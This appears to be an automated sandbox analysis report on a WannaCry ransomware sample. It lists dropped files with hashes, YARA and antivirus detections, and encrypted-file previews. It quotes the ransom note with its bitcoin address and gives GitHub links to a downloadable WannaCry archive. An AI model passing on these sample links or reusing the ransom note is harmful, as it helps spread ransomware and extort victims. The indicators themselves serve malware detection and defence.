                                                                        https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipGet hashmaliciousConti, WannacryBrowse
                                                                          Request for Quotation (RFQ_196).zip.zipGet hashmaliciousWannacry, ContiBrowse
                                                                            https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zipGet hashmaliciousWannacry, ContiBrowse
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                              • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                              • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999836148037619
                                                                              Encrypted:true
                                                                              SSDEEP:24576:NgzlxGS3fcwnUc8kbspHNIJvTLNupqV5gTl3SgzGw:NgqmfcpHaIWJvceg3
                                                                              MD5:6F2CABFF5C7BAF1C56618C11342E58DD
                                                                              SHA1:D7F3084E70C5602611D0BA8C40EDDF782A980C1D
                                                                              SHA-256:961EDD033A485A4C78EA3ACB96D7FDB7D000B4D5C5C7879F554218AF9F0E68CF
                                                                              SHA-512:17096D2ED01CDFC1A520F548B855D33656CE4F7E20305B462FC1B812A8E6AA32B30EB372C42361CFC318868056186927D698AD54388596DAE7B96DD4DA2FF57A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....k..AG..(.L8R.\..".^....."..*..q1.VC4Z.....@*U..Id...\.f@._....).3.'.(.Z..."V8.G%.X.......8S.tj...{.....+.2.......1aI.....p......Su_mI.m.'6>j.....;.:Y.tH..ik..=...m......U...9......./.].wG....~6.......7./..3..l..pb..8J...'...+...x."x..M...\...A................B.S..<..dW4...".?J^.7..8...@.s....h.h....\)u. .....]8..4$6RZ(..`b.w.....o...?:..t.].fe#^.....z.....v.....Hd{F0..y..F.....F.;..l.a..z.......Y.E*._FzL_0.o..e.r...N./.'.nGx.FJ.......x.jtT...'.7*.O]ln.G..pra..@.m491Oh.1..(.../..^....}..Q.q......v.......X....$..EP`...J.....7......\....v;#..r..`...Ho.F...Gc.#":..."....z.Qj*..4..hz?q.......%..$...P]|e...m.|..=7..]s>.....Q*.B.V.N....`........z92..=Skt.mg..E..^Om.p..n9xF}..E.v...BC..J.aB$..h.....mE...y..W.6...s....M.o.%...G....#.....m7_....d_|4<?.kf...QM.O.....p..xe'.. )q.......X...H5....Ut..[T...-E..c...#.K_...{.9.N*`.7...d..3o....W.....~.b.a}.A..._cAW.:...'[e....jX. .qkX*`#...D\.g....]./1..jR.0Rr....J....( .K.l ...F.@...vM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999836148037619
                                                                              Encrypted:true
                                                                              SSDEEP:24576:NgzlxGS3fcwnUc8kbspHNIJvTLNupqV5gTl3SgzGw:NgqmfcpHaIWJvceg3
                                                                              MD5:6F2CABFF5C7BAF1C56618C11342E58DD
                                                                              SHA1:D7F3084E70C5602611D0BA8C40EDDF782A980C1D
                                                                              SHA-256:961EDD033A485A4C78EA3ACB96D7FDB7D000B4D5C5C7879F554218AF9F0E68CF
                                                                              SHA-512:17096D2ED01CDFC1A520F548B855D33656CE4F7E20305B462FC1B812A8E6AA32B30EB372C42361CFC318868056186927D698AD54388596DAE7B96DD4DA2FF57A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....k..AG..(.L8R.\..".^....."..*..q1.VC4Z.....@*U..Id...\.f@._....).3.'.(.Z..."V8.G%.X.......8S.tj...{.....+.2.......1aI.....p......Su_mI.m.'6>j.....;.:Y.tH..ik..=...m......U...9......./.].wG....~6.......7./..3..l..pb..8J...'...+...x."x..M...\...A................B.S..<..dW4...".?J^.7..8...@.s....h.h....\)u. .....]8..4$6RZ(..`b.w.....o...?:..t.].fe#^.....z.....v.....Hd{F0..y..F.....F.;..l.a..z.......Y.E*._FzL_0.o..e.r...N./.'.nGx.FJ.......x.jtT...'.7*.O]ln.G..pra..@.m491Oh.1..(.../..^....}..Q.q......v.......X....$..EP`...J.....7......\....v;#..r..`...Ho.F...Gc.#":..."....z.Qj*..4..hz?q.......%..$...P]|e...m.|..=7..]s>.....Q*.B.V.N....`........z92..=Skt.mg..E..^Om.p..n9xF}..E.v...BC..J.aB$..h.....mE...y..W.6...s....M.o.%...G....#.....m7_....d_|4<?.kf...QM.O.....p..xe'.. )q.......X...H5....Ut..[T...-E..c...#.K_...{.9.N*`.7...d..3o....W.....~.b.a}.A..._cAW.:...'[e....jX. .qkX*`#...D\.g....]./1..jR.0Rr....J....( .K.l ...F.@...vM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8248
                                                                              Entropy (8bit):7.977011900442407
                                                                              Encrypted:false
                                                                              SSDEEP:192:SFYagquLzSse/XuB21H4viuYU9Mp4yPq6nZ33P:SFYagqunm+Yx4viGWpLy65/
                                                                              MD5:5924BFCC4719CEA1DBEF065514110B69
                                                                              SHA1:59BDF1ACF42561700692182E343669E952588FBA
                                                                              SHA-256:B1B4A82B04E8F3C82F4151A97EC266E82DAC6F9D3443BF61D58A445240C99A22
                                                                              SHA-512:9DE97190D9FB17D7D53BB3B634ADD3B4C08565B92379E450CA8BE05956FFD335E3CC68C20601F0E8E979335690D98F88D35FD69D837A24A966ED3705AB1A2F8C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....[@.([..U..ur....S,i.2.....T.4`.uc7..}u."B.....(...f\..J$.Q.R....T...'.OX.a.5ZK.s.T0....:.&.Y.f.E..9.y..Z.q.kbl._.[I..z?.4..&_eQ2..A.....@...h4..Z7....{E...Rg....f.......|...QO.cj.....<..r...{.v.e.Y...?..z\uN`.G/....G...o....b......j..nR..P..Q............g...p.5y.-n...l}.L..&..,..y`..#...h1...dG.q..i..i.^%.T.<.......J.Goz;;5....a.T.s.FJ/S.............C.Y#...v1h3{..dr`V./6.8........ 1.,..].p.&.@..fe{NG..iW5.'.....sg....q.e...$..'..%....J.*...3..iX.~..?.s..;.2..~%..u.i....|..C'u..Xq.K..].J..&...a...UD..\4....X....(A..3.O....!..fS.S.E......i:.........\U.n..........*....7.DKp...IZ.?<.A....+......+.;'...6...d...?..s!..Y.........fOOc.U..T...6.~..K.6...Tx.[opK.E98..z.`U...Uu?..1S5&eG.....K..*".s:,.(.t...F..8..u..2K...\..(..,..6B...1uH_....zl(@.({..H.10....V...;n..W.*..e.4.ku..X...P6..h..x...C.M6*N/.."...$.=r.3....p.........u...;.Dl..o..#Nn.......7B.c........o,.WWR.2T...T..=Q..U5..M..P..mr.8..K*....<>"....;,.HhtP#....y.....J5.].m..#.D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8248
                                                                              Entropy (8bit):7.977011900442407
                                                                              Encrypted:false
                                                                              SSDEEP:192:SFYagquLzSse/XuB21H4viuYU9Mp4yPq6nZ33P:SFYagqunm+Yx4viGWpLy65/
                                                                              MD5:5924BFCC4719CEA1DBEF065514110B69
                                                                              SHA1:59BDF1ACF42561700692182E343669E952588FBA
                                                                              SHA-256:B1B4A82B04E8F3C82F4151A97EC266E82DAC6F9D3443BF61D58A445240C99A22
                                                                              SHA-512:9DE97190D9FB17D7D53BB3B634ADD3B4C08565B92379E450CA8BE05956FFD335E3CC68C20601F0E8E979335690D98F88D35FD69D837A24A966ED3705AB1A2F8C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....[@.([..U..ur....S,i.2.....T.4`.uc7..}u."B.....(...f\..J$.Q.R....T...'.OX.a.5ZK.s.T0....:.&.Y.f.E..9.y..Z.q.kbl._.[I..z?.4..&_eQ2..A.....@...h4..Z7....{E...Rg....f.......|...QO.cj.....<..r...{.v.e.Y...?..z\uN`.G/....G...o....b......j..nR..P..Q............g...p.5y.-n...l}.L..&..,..y`..#...h1...dG.q..i..i.^%.T.<.......J.Goz;;5....a.T.s.FJ/S.............C.Y#...v1h3{..dr`V./6.8........ 1.,..].p.&.@..fe{NG..iW5.'.....sg....q.e...$..'..%....J.*...3..iX.~..?.s..;.2..~%..u.i....|..C'u..Xq.K..].J..&...a...UD..\4....X....(A..3.O....!..fS.S.E......i:.........\U.n..........*....7.DKp...IZ.?<.A....+......+.;'...6...d...?..s!..Y.........fOOc.U..T...6.~..K.6...Tx.[opK.E98..z.`U...Uu?..1S5&eG.....K..*".s:,.(.t...F..8..u..2K...\..(..,..6B...1uH_....zl(@.({..H.10....V...;n..W.*..e.4.ku..X...P6..h..x...C.M6*N/.."...$.=r.3....p.........u...;.Dl..o..#Nn.......7B.c........o,.WWR.2T...T..=Q..U5..M..P..mr.8..K*....<>"....;,.HhtP#....y.....J5.].m..#.D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5976
                                                                              Entropy (8bit):7.968664444642169
                                                                              Encrypted:false
                                                                              SSDEEP:96:otdlU1gnqS+ehqQnI9xmlNmPee78XRDWPPOjuOOrKHXoiNa0A+IaVkxZX487Dks2:gUCnqSBIe7FRDyPwvOsnoZXh7osvqdUm
                                                                              MD5:2E62913ED11D0A5C54C9CA239AFC7464
                                                                              SHA1:5EB2B22710980DD9B1ADD250BA308EB1ED0DC57C
                                                                              SHA-256:7D47749C57A612FB68AE5FD0176FA557DCE3A610ABE894FCFD891D3A4BAF16D8
                                                                              SHA-512:A6B3C3A581A62E9116095E283CB45EA3364C1D893814822A20232061DCF0161D92D1622A3AAE48947906DD43199B8FB726A0EE2FB6AF7A62848D4568DE2A48B2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....zx...........d....J...B..MT.m...."..\,..PB.0G......~..j4.XH.qW.b..x].A.v*....b....V..E5...7-...g...I&.D5.@..*..+..q....@>...L...~.S8J..>.4y.}8?"....H..v9.....\...........=.W'.r.<.c.TPb3.6.\.+.Z..;x..r.5...tc.+.z|qM6.*f...~.Yi..`....f.....mT9...g.....9.......t......}M.CE..+.~.7..Z|=.d.q|..i~..<./5.0).B.k.Jx_..B........D.U..Y-.? .......E..p$7.86esz.d!........1......a.(Oi...0....>.ON.......Q....O-.q.).v...G,....B(k-.....e...=UJ.N u..K@)mlgD ..^.2r.=......$......Hic-C.%.. ?..FV.{......9.\..C+.Xp.>....c.;[.O.>..}.*h.......&uN..te..wRm.n.......+$.".j..<./.......E1..s..).6S........`..u...B...-.M.lk....Q.(_.....U....j....PG4....?l.>l..b7Ob.0I&(..G.O...>..+.%Y..F.`.C..i..k....\.,.KWc..u........U.`..v..5m..l..\8i.j.s{..................8U`.L..._%..t<...m... ..n.....6.......c..Jt..$.o.C..O..h....8.-2.............(..G$W........<.Z...X7..?..R.$..#.R....a...q.c.97..Rp/y. .).;..j.......;....Gk0.u..p..4!.|'...orE`Wj....u....T...)...?....>........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5976
                                                                              Entropy (8bit):7.968664444642169
                                                                              Encrypted:false
                                                                              SSDEEP:96:otdlU1gnqS+ehqQnI9xmlNmPee78XRDWPPOjuOOrKHXoiNa0A+IaVkxZX487Dks2:gUCnqSBIe7FRDyPwvOsnoZXh7osvqdUm
                                                                              MD5:2E62913ED11D0A5C54C9CA239AFC7464
                                                                              SHA1:5EB2B22710980DD9B1ADD250BA308EB1ED0DC57C
                                                                              SHA-256:7D47749C57A612FB68AE5FD0176FA557DCE3A610ABE894FCFD891D3A4BAF16D8
                                                                              SHA-512:A6B3C3A581A62E9116095E283CB45EA3364C1D893814822A20232061DCF0161D92D1622A3AAE48947906DD43199B8FB726A0EE2FB6AF7A62848D4568DE2A48B2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....zx...........d....J...B..MT.m...."..\,..PB.0G......~..j4.XH.qW.b..x].A.v*....b....V..E5...7-...g...I&.D5.@..*..+..q....@>...L...~.S8J..>.4y.}8?"....H..v9.....\...........=.W'.r.<.c.TPb3.6.\.+.Z..;x..r.5...tc.+.z|qM6.*f...~.Yi..`....f.....mT9...g.....9.......t......}M.CE..+.~.7..Z|=.d.q|..i~..<./5.0).B.k.Jx_..B........D.U..Y-.? .......E..p$7.86esz.d!........1......a.(Oi...0....>.ON.......Q....O-.q.).v...G,....B(k-.....e...=UJ.N u..K@)mlgD ..^.2r.=......$......Hic-C.%.. ?..FV.{......9.\..C+.Xp.>....c.;[.O.>..}.*h.......&uN..te..wRm.n.......+$.".j..<./.......E1..s..).6S........`..u...B...-.M.lk....Q.(_.....U....j....PG4....?l.>l..b7Ob.0I&(..G.O...>..+.%Y..F.`.C..i..k....\.,.KWc..u........U.`..v..5m..l..\8i.j.s{..................8U`.L..._%..t<...m... ..n.....6.......c..Jt..$.o.C..O..h....8.-2.............(..G$W........<.Z...X7..?..R.$..#.R....a...q.c.97..Rp/y. .).;..j.......;....Gk0.u..p..4!.|'...orE`Wj....u....T...)...?....>........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):19880
                                                                              Entropy (8bit):7.990080039380613
                                                                              Encrypted:true
                                                                              SSDEEP:384:RkmqCBIOedh31GHogNXbVqINANUFXaFh2kE:RxqbH31wogVqGqFIt
                                                                              MD5:4BD73955D9FA54DCF57811ECD9392FF4
                                                                              SHA1:93D4EEAE42902BCB0FE0C1C21E4E21A30CBF5FD2
                                                                              SHA-256:74179B993E9A284713D3834DD2A5905E86A482928EF9719B0417BA1234AA9BE4
                                                                              SHA-512:DEECC45E309A8F41FAB60216A290C83E2F27B82721EDD57BB43322F28DFEAE079E8C3283488253549EE55AE8BC7E9F879000710923E64DEDF2E6216CA4986504
                                                                              Malicious:true
                                                                              Preview:WANACRY!....6.?....iT.*......B...t.,..$...A.a..l.x...?....i.7.v..b..c_@...g.B....E.../.;....,\..ag..d..(....w2l....&N-uJ.&....KI.|.v......s... .`gb..f.u.nZ.L.~..'dn.....3.q[.0e!]J.4..;.%%#.T.!.M.........]t{......m...B..._..}=6........A...pEwA..v..........L..........u95k)....$.......p.:.gC[..W[../.......Y.....yGp........H...%.l.uS..p.M.O.:l.h.*....z.<.Y{[...N.R...].....$.e.%.&<l......|w...6t.0=.0}..Z.2weT..5U..$...K.......S.@-..*.X.g......>@."o9./.N....$K.|>..,Dv...9h.f4...^#.B.<...P.6.GA.1...j.~./....k.....zg..s%.....Aw...Y......$_.....Y.N.@~..J..o..t.......:,........{..H...|?...|..O...= ..[..Z#..H.<7F......H..Y......H.$.p.D.hS...Z3...{F.......2{X...;.U{J.hNJ@..s.E\.....>.R`O..;v`.nR..p.....t..}..'.J7S ..I..0..S...R..zu....U/.....T?.LW...._..f.U*.q..2F}...m..._+@.'._Wk%L.:.'M..q.*...jE..~`..jI."]. U..A.7.|.K.S..s..2...A.........(........[%{A~...:..........$...B....6.$.`....!.Gk.8u......vW...<s.T....$......&.q..f)g<1.f$..27....|~.0...0.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):19880
                                                                              Entropy (8bit):7.990080039380613
                                                                              Encrypted:true
                                                                              SSDEEP:384:RkmqCBIOedh31GHogNXbVqINANUFXaFh2kE:RxqbH31wogVqGqFIt
                                                                              MD5:4BD73955D9FA54DCF57811ECD9392FF4
                                                                              SHA1:93D4EEAE42902BCB0FE0C1C21E4E21A30CBF5FD2
                                                                              SHA-256:74179B993E9A284713D3834DD2A5905E86A482928EF9719B0417BA1234AA9BE4
                                                                              SHA-512:DEECC45E309A8F41FAB60216A290C83E2F27B82721EDD57BB43322F28DFEAE079E8C3283488253549EE55AE8BC7E9F879000710923E64DEDF2E6216CA4986504
                                                                              Malicious:true
                                                                              Preview:WANACRY!....6.?....iT.*......B...t.,..$...A.a..l.x...?....i.7.v..b..c_@...g.B....E.../.;....,\..ag..d..(....w2l....&N-uJ.&....KI.|.v......s... .`gb..f.u.nZ.L.~..'dn.....3.q[.0e!]J.4..;.%%#.T.!.M.........]t{......m...B..._..}=6........A...pEwA..v..........L..........u95k)....$.......p.:.gC[..W[../.......Y.....yGp........H...%.l.uS..p.M.O.:l.h.*....z.<.Y{[...N.R...].....$.e.%.&<l......|w...6t.0=.0}..Z.2weT..5U..$...K.......S.@-..*.X.g......>@."o9./.N....$K.|>..,Dv...9h.f4...^#.B.<...P.6.GA.1...j.~./....k.....zg..s%.....Aw...Y......$_.....Y.N.@~..J..o..t.......:,........{..H...|?...|..O...= ..[..Z#..H.<7F......H..Y......H.$.p.D.hS...Z3...{F.......2{X...;.U{J.hNJ@..s.E\.....>.R`O..;v`.nR..p.....t..}..'.J7S ..I..0..S...R..zu....U/.....T?.LW...._..f.U*.q..2F}...m..._+@.'._Wk%L.:.'M..q.*...jE..~`..jI."]. U..A.7.|.K.S..s..2...A.........(........[%{A~...:..........$...B....6.$.`....!.Gk.8u......vW...<s.T....$......&.q..f)g<1.f$..27....|~.0...0.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2104
                                                                              Entropy (8bit):7.918672632993942
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkVSQ3ZtST3QsfgY/7BZLNVBtI4ZEr85t3F61xm/wBJUf2:oVj3Zty3QsfgWZZVBtI4ZEr8HF6vMwBn
                                                                              MD5:34535CA989A363881423C16222F7AD35
                                                                              SHA1:0401945022427C9EE5C7A448C2C5242E4F28ED68
                                                                              SHA-256:6D6DBFC80617C2600FFEA9472238CDDD506ABC7430A9DC7BF91EA97DD1F55C6E
                                                                              SHA-512:E4A03A1FA16BE1240E4A1FF430FCA2401CB8B3B93A69B684263CB24553184F159F5D59686565AC3E33D70FDE64BB0980C87567B0A62521AEF1591AE76854294E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......~...9.-.......).W..J..._....Tl...LP..T.$..w..wz..<...A5.6..^........ .+......cq..QL.1.RB..H..W.M..>;..neY.....o].`.o..A..:..R#...n....R........&<.%.^_.3.6L*..@..^..'.N?......L.AoE...a.c......7..]....P..fIT.o...h......h([.fvK......<..............eo...y.xr.F...h9.&.$...../.2.3'.......K..I.a.eg.%G.b..>...6.RM..m..a....b?.i....D..t{C.,...(..g........o....N............-i.9..<......%@>z.....eoX.....@.B.7.H.7..=O...`....s6&C.w....!.....,..w...j"b......sA..4...q.G....5.......x.s7^.....U...+ V[d.6.2s>.....!......6O.|9:.0.>.=...S:,a.oWP.2..a.v..6..+.."...{%N......!..V6~2...I.GS.}OK.}...Xq........g.v.....i...pO....$!..[..@?.d...e.......R.KA....f.i..0...=..s.W-`.6...$!4...."....VB...5..X...'...M.y......e`;'......k.....o...T......9..|-$^.....$.r...`...q.E.'.B....I. G.a.Q.|.....:6'N.].G.....\.8..|q.#I.q.b...-.....).........}+9S}....S..Du.C...(.G.d).7.5.....z..!.. -...t...UDz.c....../.6..r.6b.....,.;.1K*.j.n.g.D)%o..k#...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2104
                                                                              Entropy (8bit):7.918672632993942
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkVSQ3ZtST3QsfgY/7BZLNVBtI4ZEr85t3F61xm/wBJUf2:oVj3Zty3QsfgWZZVBtI4ZEr8HF6vMwBn
                                                                              MD5:34535CA989A363881423C16222F7AD35
                                                                              SHA1:0401945022427C9EE5C7A448C2C5242E4F28ED68
                                                                              SHA-256:6D6DBFC80617C2600FFEA9472238CDDD506ABC7430A9DC7BF91EA97DD1F55C6E
                                                                              SHA-512:E4A03A1FA16BE1240E4A1FF430FCA2401CB8B3B93A69B684263CB24553184F159F5D59686565AC3E33D70FDE64BB0980C87567B0A62521AEF1591AE76854294E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......~...9.-.......).W..J..._....Tl...LP..T.$..w..wz..<...A5.6..^........ .+......cq..QL.1.RB..H..W.M..>;..neY.....o].`.o..A..:..R#...n....R........&<.%.^_.3.6L*..@..^..'.N?......L.AoE...a.c......7..]....P..fIT.o...h......h([.fvK......<..............eo...y.xr.F...h9.&.$...../.2.3'.......K..I.a.eg.%G.b..>...6.RM..m..a....b?.i....D..t{C.,...(..g........o....N............-i.9..<......%@>z.....eoX.....@.B.7.H.7..=O...`....s6&C.w....!.....,..w...j"b......sA..4...q.G....5.......x.s7^.....U...+ V[d.6.2s>.....!......6O.|9:.0.>.=...S:,a.oWP.2..a.v..6..+.."...{%N......!..V6~2...I.GS.}OK.}...Xq........g.v.....i...pO....$!..[..@?.d...e.......R.KA....f.i..0...=..s.W-`.6...$!4...."....VB...5..X...'...M.y......e`;'......k.....o...T......9..|-$^.....$.r...`...q.E.'.B....I. G.a.Q.|.....:6'N.].G.....\.8..|q.#I.q.b...-.....).........}+9S}....S..Du.C...(.G.d).7.5.....z..!.. -...t...UDz.c....../.6..r.6b.....,.;.1K*.j.n.g.D)%o..k#...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3160
                                                                              Entropy (8bit):7.9394849819063795
                                                                              Encrypted:false
                                                                              SSDEEP:96:oj/ZEQKDkKy/2kgkhxfyGnihL5iCX670lcllLbr0x:tVzkJ5e6/llLUx
                                                                              MD5:632C2EEBE6ED8F394504D8D019A57192
                                                                              SHA1:B9E9365D1DF9D4194B0C8E6ABC539A4C5AD5D764
                                                                              SHA-256:5127AB08EBFEE388CFD2796970A14AD0759ADB1A13B98197FF6F167A46DF0AFE
                                                                              SHA-512:86726CF55D779D49C07F9C19088220AB06C5746427A53B7C5B23B07065FA2ACFA07D16EE10D40C8EE90256D7CFC96293F8CBA9A2AEF7BF73125E35756768FE80
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Zht1u!.I`...7.h........#T.*._..~.y..j..~vw4V.....O.b.:3..%R.@0......Y..A..n...Dc!....>.j...(u..).....9.....g...Ua.y.............bm..q.J{.T`o...9.l$......u.....`...T2\.3....&x>y.....t...XO<.P.F.Q.S..7-q5.y..eo.dI.....2./.G*.Y.......T.........3........$.fl.L...z...(.>GE|.)M.y..e|....@.|z0.....&S.J9Y:..q..$e.?J:.5....e....N.U.P.+Y............1.,.. .S....x...._........M<.......Jd....._zF.J...j..kF=./.N....I.z.....g..8.4.oP.:.*DoB....Ju..^.Q......m.4p....0...9.s`5..Z&.S-..K.e.'...n....|....9.....d.4..}..D...KI*].M.........<.!s.....d...../....=Ii..eA....M.>`K<...D3..X...y.0v.e..N..%k.}M.E..}g.DW .V..+.ZF.-..;Wc.V....<$R.#K(tLY....K.s..=...RIIMH;....$..+....Z......jo...OU.#.. .!..y.s.KXRG..St.eD.t..a.u.^N...5.f.*.'2....X..........^>..;*.l'-.n..P,.`..#2.P...!.kc?.3..K.``4....o....3.^.f...fnZJH..\.?..7s...>x?.E..k.Wn...E....... .......*..-.S|..}.m'...4....!q\j...R=).....lN...Sm..E...Q1.0|....FR.T*...k2T;..Bgy..........BAy."~..$..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3160
                                                                              Entropy (8bit):7.9394849819063795
                                                                              Encrypted:false
                                                                              SSDEEP:96:oj/ZEQKDkKy/2kgkhxfyGnihL5iCX670lcllLbr0x:tVzkJ5e6/llLUx
                                                                              MD5:632C2EEBE6ED8F394504D8D019A57192
                                                                              SHA1:B9E9365D1DF9D4194B0C8E6ABC539A4C5AD5D764
                                                                              SHA-256:5127AB08EBFEE388CFD2796970A14AD0759ADB1A13B98197FF6F167A46DF0AFE
                                                                              SHA-512:86726CF55D779D49C07F9C19088220AB06C5746427A53B7C5B23B07065FA2ACFA07D16EE10D40C8EE90256D7CFC96293F8CBA9A2AEF7BF73125E35756768FE80
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Zht1u!.I`...7.h........#T.*._..~.y..j..~vw4V.....O.b.:3..%R.@0......Y..A..n...Dc!....>.j...(u..).....9.....g...Ua.y.............bm..q.J{.T`o...9.l$......u.....`...T2\.3....&x>y.....t...XO<.P.F.Q.S..7-q5.y..eo.dI.....2./.G*.Y.......T.........3........$.fl.L...z...(.>GE|.)M.y..e|....@.|z0.....&S.J9Y:..q..$e.?J:.5....e....N.U.P.+Y............1.,.. .S....x...._........M<.......Jd....._zF.J...j..kF=./.N....I.z.....g..8.4.oP.:.*DoB....Ju..^.Q......m.4p....0...9.s`5..Z&.S-..K.e.'...n....|....9.....d.4..}..D...KI*].M.........<.!s.....d...../....=Ii..eA....M.>`K<...D3..X...y.0v.e..N..%k.}M.E..}g.DW .V..+.ZF.-..;Wc.V....<$R.#K(tLY....K.s..=...RIIMH;....$..+....Z......jo...OU.#.. .!..y.s.KXRG..St.eD.t..a.u.^N...5.f.*.'2....X..........^>..;*.l'-.n..P,.`..#2.P...!.kc?.3..K.``4....o....3.^.f...fnZJH..\.?..7s...>x?.E..k.Wn...E....... .......*..-.S|..}.m'...4....!q\j...R=).....lN...Sm..E...Q1.0|....FR.T*...k2T;..Bgy..........BAy."~..$..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4120
                                                                              Entropy (8bit):7.95100228844022
                                                                              Encrypted:false
                                                                              SSDEEP:96:oQNMFkTO4/LyvQEF6hi0h2DKvZgRPV2LPvdhgGXdBJDIQ/GBgUG7uChnS:5mkd/GvLMZ2WvZgGPgoRGB87JhS
                                                                              MD5:E46C09EF1AE16837B66211C2F758C138
                                                                              SHA1:B46BCE46AD77F195C8FD5213EC547F2F88E1C307
                                                                              SHA-256:C494D3F78C96E5F2837F0D1151C587C1F3157887EC346FC46678E7D9F906A568
                                                                              SHA-512:E88D46584C8E677EE2F492A48D044F5838B43F5E96FC375B79A32DB798B1B534C615B465CC8853A3970D8AE899386BF05357F7B89430BB976B7B77974A0A6A1A
